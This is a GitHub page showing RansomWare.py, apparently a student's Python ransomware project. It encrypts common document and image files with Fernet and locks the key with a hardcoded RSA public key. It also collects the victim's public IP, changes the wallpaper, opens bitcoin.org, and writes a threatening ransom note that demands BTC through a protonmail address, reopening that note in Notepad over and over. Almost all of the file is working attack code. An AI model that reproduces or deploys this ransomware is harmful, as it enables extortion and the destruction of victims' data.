-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathRansomWare.py
More file actions
209 lines (167 loc) · 6.82 KB
/
Copy pathRansomWare.py
File metadata and controls
209 lines (167 loc) · 6.82 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
from cryptography.fernet import Fernet
import os
import webbrowser
import ctypes
import urllib.request
import cv2
import requests
import time
import datetime
import subprocess
import win32gui
from Crypto.PublicKey import RSA
import threading
from Crypto.Cipher import AES, PKCS1_OAEP
publicKey = '''-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnArEz5F2J43Bg6KQS/Mk
dJ+lf+L63azLkI4fY5QIGUJ3dMHU6JCHtLXk9SF8dRKbp382iXhI3w1p3XDXiJCr
rAT11BVVuUEmLNxD6vmf6DkVMrHsXwAGftYjfa8MoMdL3V9UFZHiOMH+B1mEUNnO
MYA8j2IAL4ncwzySHbiUqQeKOg9BN5hPW4Lj0DfqembyA6uYWizkhIf+Mdrql9ui
uoBZhTpnsMQA5sjUyYXrtmoM7Ngg2oM3/isKPSWxzfdaSikmaGK2VNJPBxtMShq3
+dw1BkOKb6Zn8NGIQ/z+l8ETdyOGdjE64Gy4f8VeACrMQlZWND7nyfYTd2p39zMz
GQIDAQAB
-----END PUBLIC KEY-----'''
class RansomWare:
file_exts = [
'txt',
'png',
'jpg',
'csv',
'pdf',
'xls',
'docx'
]
def __init__(self):
self.key = None
self.crypter = None
self.public_key = None
self.sysRoot = os.path.expanduser('~')
self.localRoot = r'C:\Users\Acer\Desktop\3AnnéeEsisa2022\deuxieme semestre\PFA\Python-Ransomware-master\Test'
self.publicIP = requests.get('https://api.ipify.org').text
def generate_key(self):
self.key = Fernet.generate_key()
self.crypter = Fernet(self.key)
def write_key(self):
with open('fernet_key.txt', 'wb') as f:
f.write(self.key)
def encrypt_fernet_key(self):
with open('fernet_key.txt', 'rb') as fk:
fernet_key = fk.read()
with open('fernet_key.txt', 'wb') as f:
self.public_key = RSA.import_key(publicKey)
public_crypter = PKCS1_OAEP.new(self.public_key)
enc_fernent_key = public_crypter.encrypt(fernet_key)
f.write(enc_fernent_key)
with open('EMAIL_ME.txt', 'wb') as fa:
fa.write(enc_fernent_key)
self.key = enc_fernent_key
self.crypter = None
def crypt_file(self, file_path, encrypted=False):
with open(file_path, 'rb') as f:
data = f.read()
if not encrypted:
print(data)
_data = self.crypter.encrypt(data)
print('> File encrpyted')
print(_data)
else:
_data = self.crypter.decrypt(data)
print('> File decrpyted')
print(_data)
with open(file_path, 'wb') as fp:
fp.write(_data)
def crypt_system(self, encrypted=False):
system = os.walk(self.localRoot, topdown=True)
for root, dir, files in system:
for file in files:
file_path = os.path.join(root, file)
if not file.split('.')[-1] in self.file_exts:
continue
if not encrypted:
self.crypt_file(file_path)
else:
self.crypt_file(file_path, encrypted=True)
@staticmethod
def what_is_bitcoin():
url = 'https://bitcoin.org'
webbrowser.open(url)
def change_desktop_background(self):
imageUrl = r"C:\Users\Acer\Desktop\3AnnéeEsisa2022\deuxieme semestre\PFA\Python-Ransomware-master\images\img7.jpg"
SPI_SETDESKWALLPAPER = 20
ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, imageUrl, 0)
def ransom_note(self):
date = datetime.date.today().strftime('%d-%B-Y')
with open('RANSOM_NOTE.txt', 'w') as f:
f.write(f'''
The harddisks of your computer have been encrypted with an Military grade encryption algorithm.
There is no way to restore your data without a special key.
Only we can decrypt your files!
To purchase your key and restore your data, please follow these three easy steps:
1. Email the file called EMAIL_ME.txt at {self.sysRoot}Desktop/EMAIL_ME.txt to GetYourFilesBack@protonmail.com
2. You will recieve your personal BTC address for payment.
Once payment has been completed, send another email to GetYourFilesBack@protonmail.com stating "PAID".
We will check to see if payment has been paid.
3. You will receive a text file with your KEY that will unlock all your files.
IMPORTANT: To decrypt your files, place text file on desktop and wait. Shortly after it will begin to decrypt all files.
WARNING:
Do NOT attempt to decrypt your files with any software as it is obselete and will not work, and may cost you more to unlcok your files.
Do NOT change file names, mess with the files, or run deccryption software as it will cost you more to unlock your files-
-and there is a high chance you will lose your files forever.
Do NOT send "PAID" button without paying, price WILL go up for disobedience.
Do NOT think that we wont delete your files altogether and throw away the key if you refuse to pay. WE WILL.
''')
def show_ransom_note(self):
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
count = 0
while True:
time.sleep(0.1)
top_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if top_window == 'RANSOM_NOTE - Notepad':
print('Ransom note is the top window - do nothing')
pass
else:
print('Ransom note is not the top window - kill/create process again')
time.sleep(0.1)
ransom.kill()
time.sleep(0.1)
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
time.sleep(10)
count +=1
if count == 5:
break
def put_me_on_desktop(self):
print('started')
while True:
try:
print('trying')
with open(f'PUT_ME_ON_DESKTOP.txt', 'r') as f:
self.key = f.read()
self.crypter = Fernet(self.key)
self.crypt_system(encrypted=True)
print('decrypted')
break
except Exception as e:
print(e)
pass
time.sleep(30)
print('Checking for PUT_ME_ON_DESKTOP.txt')
from turtle import screensize
def main():
rw = RansomWare()
rw.generate_key()
rw.crypt_system()
rw.write_key()
rw.encrypt_fernet_key()
rw.change_desktop_background()
rw.what_is_bitcoin()
rw.ransom_note()
t1 = threading.Thread(target=rw.show_ransom_note)
t2 = threading.Thread(target=rw.put_me_on_desktop)
t1.start()
print('> RansomWare: Attack completed on target machine and system is encrypted')
print('> RansomWare: Waiting for attacker to give target machine document that will un-encrypt machine')
t2.start()
print('> RansomWare: Target machine has been un-encrypted')
print('> RansomWare: Completed')
if __name__ == '__main__':
main()